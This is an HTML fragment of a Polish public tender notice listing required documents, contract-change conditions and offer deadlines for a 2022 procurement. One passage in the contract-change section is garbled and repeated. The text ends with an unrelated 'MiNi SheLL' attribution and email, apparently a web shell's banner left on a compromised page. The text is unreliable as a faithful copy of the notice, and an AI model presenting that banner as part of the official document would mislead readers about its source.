baz danych, o ile<br/>wykonawca dostarczył dane umożliwiające dostęp do tych dokumentów,<br/>Oświadczenie o niepodleganiu wykluczeniu, spełnianiu warunków udziału w postępowaniu składane<br/>wraz z ofertą pod rygorem nieważności, w formie elektronicznej. ) wykazu osób, skierowanych przez<br/>wykonawcę do realizacji zamówienia publicznego, o których<br/>mowa w części VI ust. 1 pkt 5 tiret 1 SWZ, wraz z informacjami na temat ich kwalifikacji zawodowych,<br/>uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a<br/>także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi<br/>osobami (wg wzoru stanowiącego załącznik do materiałów postępowania). W przypadku, gdy<br/>Wykonawca polega na osobach zdolnych do wykonania zamówienia innych podmiotów niezależnie od<br/>charakteru łączących go z nimi stosunków, do wykazu załącza pisemne zobowiązanie innych<br/>podmiotów do oddania Wykonawcy, do dyspozycji niezbędnych osób na okres korzystania z nich przy<br/>wykonaniu zamówienia).<br/>d) dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w<br/>zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną<br/>określoną przez zamawiającego w części VI ust. 1 pkt 4 SWZ<br/>e) W zakresie nie uregulowanym SWZ, zastosowanie mają przepisy rozporządzenia Ministra Rozwoju,<br/>Pracy, i Technologii z dnia 23.12.2020 r. poz. 2415 w sprawie podmiotowych środków dowodowych<br/>oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Oświadczenie o<br/>niepodleganiu wykluczeniu, spełnianiu warunków udziału w<br/>postępowaniu składane<br/>wraz z ofertą pod rygorem nieważności, w formie elektronicznej.<br/>1) Do oferty wykonawca dołącza oświadczenie o niepodleganiu wykluczeniu, spełnianiu warunków<br/>udziału w postępowaniu, w zakresie wskazanym przez zamawiającego w pkt. VI, XV SWZ</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> oświadczenie o niepodleganiu wykluczeniu, spełnianiu warunków udziału w postępowaniu<br/>składane wraz z ofertą pod rygorem nieważności, w formie elektronicznej. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z art. 454 ustawy Prawo zamówień publicznych Zamawiający przewiduje zmiany<br/>zawartej umowy dotyczące:1) terminu realizacji zamówienia w przypadku zaistnienia jednej z<br/>Zgodnie z art. 454 ustawy Prawo zamówień publicznych Zamawiający przewiduje zmiany<br/>zawartej umowy dotyczące:1) terminu realizacji zamówienia w przypadku zaistnienia jednej z<br/>następujących okoliczności: a) wstrzymania robót lub przerw w pracach powstałych z przyczyn<br/>leżących po stronie Zamawiającego, b) działań osób trzecich uniemożliwiających wykonanie<br/>prac, które to działania nie są konsekwencją winy którejkolwiek ze stron,c) w razie konieczności<br/>działań zmierzających do ograniczenia skutków zdarzenia losowego wywołanego przez czynniki<br/>zewnętrzne, którego nie można było przewidzieć,d) w razie zaistnienia zdarzeń niezależnych od<br/>Stron, po dacie zawarcia Umowy, o charakterze działania siły wyższej.e) w przypadku Zgodnie z<br/>art. 454 ustawy Prawo zamówień publicznych Zamawiający przewiduje zmiany<br/>zawartej umowy dotyczące:1) terminu realizacji zamówienia w przypadku zaistnienia jednej z<br/>następujących okoliczności: a) wstrzymania robót lub przerw w pracach powstałych z przyczyn<br/>leżących po stronie Zamawiającego, b) działań osób trzecich uniemożliwiających wykonanie<br/>prac, które to działania nie są konsekwencją winy którejkolwiek ze stron,c) w razie konieczności<br/>działań zmierzających do ograniczenia skutków zdarzenia losowego wywołanego przez czynniki<br/>zewnętrzne, którego nie można było przewidzieć,d) w razie zaistnienia zdarzeń niezależnych od<br/>Stron, po dacie zawarcia Umowy, o charakterze działania siły wyższej.e) w przypadku<br/>wystąpienia robót dodatkowych nieobjętych zamówieniem podstawowym, 2) osoby pełniącej<br/>funkcje kierownika budowy i kierowników robót w przypadku zaistnienia jednej z następujących<br/>okoliczności:a) nie wykonywania lub nienależytego wykonywania swoich obowiązków<br/>wynikających z umowy.b) śmierci, choroby lub innych zdarzeń losowych,c) zmiana ta jest<br/>konieczna z jakichkolwiek innych przyczyn niezależnych od Wykonawcy3) podwykonawców w<br/>przypadku zaistnienia jednej z następujących okoliczności:a) zmiana podwykonawcy - musi być<br/>zaakceptowana przez Zamawiającego b) zmiana zakresu powierzonych prac <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-06-27 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://zgnzoliborz.ezamawiajacy.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-06-27 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-07-27</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com